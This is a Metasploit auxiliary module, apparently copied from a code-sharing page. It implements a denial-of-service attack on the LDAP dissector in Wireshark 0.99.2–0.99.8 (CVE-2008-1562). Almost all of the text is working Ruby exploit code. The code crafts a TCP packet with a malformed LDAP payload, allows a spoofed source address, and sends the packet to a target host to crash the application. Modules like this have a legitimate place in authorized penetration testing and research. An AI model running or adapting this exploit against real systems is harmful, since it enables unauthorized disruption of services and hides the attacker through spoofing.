Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Capture
8
  include Msf::Auxiliary::Dos
9

10
  def initialize
11
    super(
12
      'Name'        => 'Wireshark LDAP Dissector DOS',
13
      'Description' => %q{
14
          The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers
15
          to cause a denial of service (application crash) via a malformed packet.
16
      },
17
      'Author'      => ['MC'],
18
      'License'     => MSF_LICENSE,
19
      'References'  =>
20
        [
21
          [ 'CVE', '2008-1562' ],
22
          [ 'OSVDB', '43840' ],
23
        ],
24
      'DisclosureDate' => 'Mar 28 2008')
25

26
    register_options([
27
      OptInt.new('RPORT', [true, 'The destination port', 389]),
28
      OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
29
    ])
30

31
    deregister_options('FILTER','PCAPFILE')
32
  end
33

34
  def run
35

36
    open_pcap
37

38
    print_status("Sending malformed LDAP packet to #{rhost}")
39

40
    m = Rex::Text.rand_text_alpha_lower(3)
41

42
    p = PacketFu::TCPPacket.new
43
    p.ip_saddr = datastore['SHOST'] || Rex::Socket.source_address(rhost)
44
    p.ip_daddr = rhost
45
    p.tcp_ack = rand(0x100000000)
46
    p.tcp_flags.syn = 1
47
    p.tcp_flags.ack = 1
48
    p.tcp_dport = datastore['RPORT'].to_i
49
    p.tcp_win = 3072
50
    p.payload = "0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016"
51
    p.recalc
52
    capture_sendto(p, rhost)
53

54
    close_pcap
55

56
  end
57
end
58

59